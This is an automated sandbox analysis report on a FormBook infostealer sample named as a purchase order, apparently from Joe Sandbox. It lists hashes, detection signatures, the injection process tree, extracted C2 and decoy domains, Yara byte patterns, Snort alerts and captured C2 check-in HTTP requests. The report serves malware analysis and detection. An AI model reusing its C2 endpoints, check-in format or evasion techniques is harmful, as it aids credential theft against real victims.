Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO_29_00412.exe

Overview

General Information

Sample Name:PO_29_00412.exe
Analysis ID:399774
MD5:e4ad95f61666b540024ff22a60816843
SHA1:c4a9865e453e8592047a849640b455f2e499f162
SHA256:bc4765682b3b1250e178d1154cfd56fbe1fb4ac0c8e8346d9e6f3ed6c661907d
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO_29_00412.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\PO_29_00412.exe' MD5: E4AD95F61666B540024FF22A60816843)
    • PO_29_00412.exe (PID: 5980 cmdline: 'C:\Users\user\Desktop\PO_29_00412.exe' MD5: E4AD95F61666B540024FF22A60816843)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 5540 cmdline: /c del 'C:\Users\user\Desktop\PO_29_00412.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.werealestatephotography.com/hw6d/"], "decoy": ["medicare101now.com", "danahillathletics.com", "realjobexpert.com", "boulderhalle-hamburg.com", "idoweddinghair.com", "awdcompanies.com", "thevillaflora.com", "neutrasystems.com", "allwest-originals.com", "designtehengsg.com", "thenewyorker.computer", "ladybugtubs.com", "silina-beauty24.com", "mifangtu.com", "fashionbranddeveloper.com", "istanbulhookah.com", "askyoyo.com", "osaka-computer.net", "conegenie.com", "agteless.com", "carsoncredittx.com", "wellalytics.com", "onjulitrading.com", "thelocallawnmen.com", "loanascustomboutique.com", "ohcaftanmycaftan.com", "ardor-fitness.com", "benzinhayvancilik.com", "apthaiproperty.com", "maxim.technology", "dfch18.com", "davaoaffordablecondo.com", "sueshemp.com", "missmaltese.com", "lakecountrydems.com", "lastminuteminister.com", "sofiascelebrations.com", "socialaspecthouston.com", "rechnung.pro", "kathyscrabhouse.com", "themusasoficial.com", "reversemortgageloanmiami.com", "vrventurebsp.com", "whatalode.com", "xh03.net", "qiqihao.site", "specstrii.com", "organicfarmteam.com", "codebinnovations.net", "kizunaservice.com", "lboclkchain.com", "frorool.com", "dpok.network", "desafogados.com", "vestblue.net", "forguyshere.com", "recordprosperity.info", "theballoonbirds.com", "adityabirla-loan.com", "midgex.info", "qishuxia.com", "panopticop.com", "gd-kangda.com", "hotelbrainclub.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.PO_29_00412.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.PO_29_00412.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.PO_29_00412.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        1.1.PO_29_00412.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.PO_29_00412.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.agteless.com/hw6d/?wR9=5qwRj4Cks+XUvhq+/72yLl02AnqHimYvFWLTxgnccFxg28KqBmPa1ezdvIZqmAulhHSP&3f=ZlLd8r8PtXAvira URL Cloud: Label: malware
          Source: http://www.sueshemp.com/hw6d/?wR9=AAdYqRCZdpBCICVD7XT/TJuWXv5e4p9OLjsTJuFeeFMT5Erf7T6eOfQLuJbJMdHcFc0O&3f=ZlLd8r8PtXAvira URL Cloud: Label: malware
          Source: http://www.lboclkchain.com/hw6d/?wR9=YjpOOYUDmjvdyafLH2XIreLzwhI/7xCnoo7q/I/3CP849+jnPV3O3CrzxJL1042huvEP&3f=ZlLd8r8PtXAvira URL Cloud: Label: malware
          Source: http://www.missmaltese.com/hw6d/?wR9=6RCAxHzHs2U8cKrh6h9/ydGjrhxnSTzcOHDfHkTTDkA8hCV/5sMta/cQsHNALet3pcHc&3f=ZlLd8r8PtXAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.werealestatephotography.com/hw6d/"], "decoy": ["medicare101now.com", "danahillathletics.com", "realjobexpert.com", "boulderhalle-hamburg.com", "idoweddinghair.com", "awdcompanies.com", "thevillaflora.com", "neutrasystems.com", "allwest-originals.com", "designtehengsg.com", "thenewyorker.computer", "ladybugtubs.com", "silina-beauty24.com", "mifangtu.com", "fashionbranddeveloper.com", "istanbulhookah.com", "askyoyo.com", "osaka-computer.net", "conegenie.com", "agteless.com", "carsoncredittx.com", "wellalytics.com", "onjulitrading.com", "thelocallawnmen.com", "loanascustomboutique.com", "ohcaftanmycaftan.com", "ardor-fitness.com", "benzinhayvancilik.com", "apthaiproperty.com", "maxim.technology", "dfch18.com", "davaoaffordablecondo.com", "sueshemp.com", "missmaltese.com", "lakecountrydems.com", "lastminuteminister.com", "sofiascelebrations.com", "socialaspecthouston.com", "rechnung.pro", "kathyscrabhouse.com", "themusasoficial.com", "reversemortgageloanmiami.com", "vrventurebsp.com", "whatalode.com", "xh03.net", "qiqihao.site", "specstrii.com", "organicfarmteam.com", "codebinnovations.net", "kizunaservice.com", "lboclkchain.com", "frorool.com", "dpok.network", "desafogados.com", "vestblue.net", "forguyshere.com", "recordprosperity.info", "theballoonbirds.com", "adityabirla-loan.com", "midgex.info", "qishuxia.com", "panopticop.com", "gd-kangda.com", "hotelbrainclub.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp\o9oo.dllReversingLabs: Detection: 14%
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO_29_00412.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO_29_00412.exe.3120000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO_29_00412.exe.3120000.4.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PO_29_00412.exeJoe Sandbox ML: detected
          Source: 1.2.PO_29_00412.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.PO_29_00412.exe.3120000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.PO_29_00412.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO_29_00412.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: PO_29_00412.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: PO_29_00412.exe, 00000000.00000003.215175981.0000000003150000.00000004.00000001.sdmp, PO_29_00412.exe, 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, rundll32.exe, 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO_29_00412.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: PO_29_00412.exe, 00000001.00000002.261401303.0000000000609000.00000004.00000020.sdmp
          Source: Binary string: rundll32.pdbGCTL source: PO_29_00412.exe, 00000001.00000002.261401303.0000000000609000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004059F0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,0_2_0040659C
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\AppData\Local\Temp\nsw1FAB.tmpJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\Desktop\PO_29_00412.exeJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\AppData\Local\Temp\d4kvs9nrjol318Jump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\AppData\Local\Temp\9o96oivnhyxfeg7Jump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49732 -> 198.71.232.3:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49732 -> 198.71.232.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49732 -> 198.71.232.3:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 216.239.38.21:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 216.239.38.21:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 216.239.38.21:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.werealestatephotography.com/hw6d/
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=5qwRj4Cks+XUvhq+/72yLl02AnqHimYvFWLTxgnccFxg28KqBmPa1ezdvIZqmAulhHSP&3f=ZlLd8r8PtX HTTP/1.1Host: www.agteless.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPaWrxhtzEdX&3f=ZlLd8r8PtX HTTP/1.1Host: www.werealestatephotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=6RCAxHzHs2U8cKrh6h9/ydGjrhxnSTzcOHDfHkTTDkA8hCV/5sMta/cQsHNALet3pcHc&3f=ZlLd8r8PtX HTTP/1.1Host: www.missmaltese.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=AAdYqRCZdpBCICVD7XT/TJuWXv5e4p9OLjsTJuFeeFMT5Erf7T6eOfQLuJbJMdHcFc0O&3f=ZlLd8r8PtX HTTP/1.1Host: www.sueshemp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=qHgMXp9xjKSDLOSO1Rlwgbov7xJRe3AlLaObeu+vQaN20mncnLVgIjt7WgvbzUpJv8vJ&3f=ZlLd8r8PtX HTTP/1.1Host: www.onjulitrading.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=Ddm3qJHqgzBdBhAnftzkfa9VwSzTwTX1J1BudaGH8hBPcPYq/VmKmGqlzVIhNMaY+qFM&3f=ZlLd8r8PtX HTTP/1.1Host: www.rechnung.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=NqDP1kNWGB45muwCVyMdlJqLatp7PevtuQ88HQHRMDyTbQkj9J6FuQuiyA3H8+Oo5z8S&3f=ZlLd8r8PtX HTTP/1.1Host: www.conegenie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=QbKX2W928fHcAtFGRb4REkUMiu4SoEjkfForEbaW1QS7nBKCPnGWTt7TK177yyq4Tjq5&3f=ZlLd8r8PtX HTTP/1.1Host: www.thelocallawnmen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=YjpOOYUDmjvdyafLH2XIreLzwhI/7xCnoo7q/I/3CP849+jnPV3O3CrzxJL1042huvEP&3f=ZlLd8r8PtX HTTP/1.1Host: www.lboclkchain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=dUGVTn/5aJJKliywqMmmpRKN90QgELEtjSlSK2PFHkAeyTnfmB2J+703q8XbnRj4tTIF&3f=ZlLd8r8PtX HTTP/1.1Host: www.sofiascelebrations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=M8b3PqXkcz6dEhacbWPz+tEbXPpZ+zWHtV+3ceu/G8IJbp6ZEJFkth5W4QT35NMVcxfa&3f=ZlLd8r8PtX HTTP/1.1Host: www.awdcompanies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.71.232.3 198.71.232.3
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=5qwRj4Cks+XUvhq+/72yLl02AnqHimYvFWLTxgnccFxg28KqBmPa1ezdvIZqmAulhHSP&3f=ZlLd8r8PtX HTTP/1.1Host: www.agteless.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPaWrxhtzEdX&3f=ZlLd8r8PtX HTTP/1.1Host: www.werealestatephotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=6RCAxHzHs2U8cKrh6h9/ydGjrhxnSTzcOHDfHkTTDkA8hCV/5sMta/cQsHNALet3pcHc&3f=ZlLd8r8PtX HTTP/1.1Host: www.missmaltese.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=AAdYqRCZdpBCICVD7XT/TJuWXv5e4p9OLjsTJuFeeFMT5Erf7T6eOfQLuJbJMdHcFc0O&3f=ZlLd8r8PtX HTTP/1.1Host: www.sueshemp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=qHgMXp9xjKSDLOSO1Rlwgbov7xJRe3AlLaObeu+vQaN20mncnLVgIjt7WgvbzUpJv8vJ&3f=ZlLd8r8PtX HTTP/1.1Host: www.onjulitrading.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=Ddm3qJHqgzBdBhAnftzkfa9VwSzTwTX1J1BudaGH8hBPcPYq/VmKmGqlzVIhNMaY+qFM&3f=ZlLd8r8PtX HTTP/1.1Host: www.rechnung.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=NqDP1kNWGB45muwCVyMdlJqLatp7PevtuQ88HQHRMDyTbQkj9J6FuQuiyA3H8+Oo5z8S&3f=ZlLd8r8PtX HTTP/1.1Host: www.conegenie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=QbKX2W928fHcAtFGRb4REkUMiu4SoEjkfForEbaW1QS7nBKCPnGWTt7TK177yyq4Tjq5&3f=ZlLd8r8PtX HTTP/1.1Host: www.thelocallawnmen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=YjpOOYUDmjvdyafLH2XIreLzwhI/7xCnoo7q/I/3CP849+jnPV3O3CrzxJL1042huvEP&3f=ZlLd8r8PtX HTTP/1.1Host: www.lboclkchain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=dUGVTn/5aJJKliywqMmmpRKN90QgELEtjSlSK2PFHkAeyTnfmB2J+703q8XbnRj4tTIF&3f=ZlLd8r8PtX HTTP/1.1Host: www.sofiascelebrations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?wR9=M8b3PqXkcz6dEhacbWPz+tEbXPpZ+zWHtV+3ceu/G8IJbp6ZEJFkth5W4QT35NMVcxfa&3f=ZlLd8r8PtX HTTP/1.1Host: www.awdcompanies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.qiqihao.site
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 29 Apr 2021 05:56:58 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Report-To: {"group":"GeoMerchantPrestoSiteUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/GeoMerchantPrestoSiteUi/external"}]}Cross-Origin-Resource-Policy: cross-originCross-Origin-Opener-Policy-Report-Only: same-origin-allow-popups; report-to="GeoMerchantPrestoSiteUi"Content-Security-Policy: script-src 'report-sample' 'nonce-yKjbPO9cW/r8JFbtNMEfag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffSet-Cookie: NID=214=SOvaASTHxw7U1fTR9rJ3TgpN6uoP22uaitiapyy700A-c0PNUvBgcy4IsPZBXRqyCotXMbgYjEVXHhDNisdmEIgsA3gZ7yHtdHfRo1dXVU3TJ01bi7dFCCk-qslNYyy0wosmA_MyPKuECW_5TiXV6QvH7yBIhotQ-xEF5pPHxCo; expires=Fri, 29-Oct-2021 05:56:58 GMT; path=/; domain=.google.com; HttpOnlyAccept-Ranges: noneVary: Accept-EncodingTransfer-Encoding: chunkedConnection: closeData Raw: 36 35 33 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 Data Ascii: 653<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, widt
          Source: explorer.exe, 00000004.00000000.247851925.000000000F672000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO_29_00412.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: PO_29_00412.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
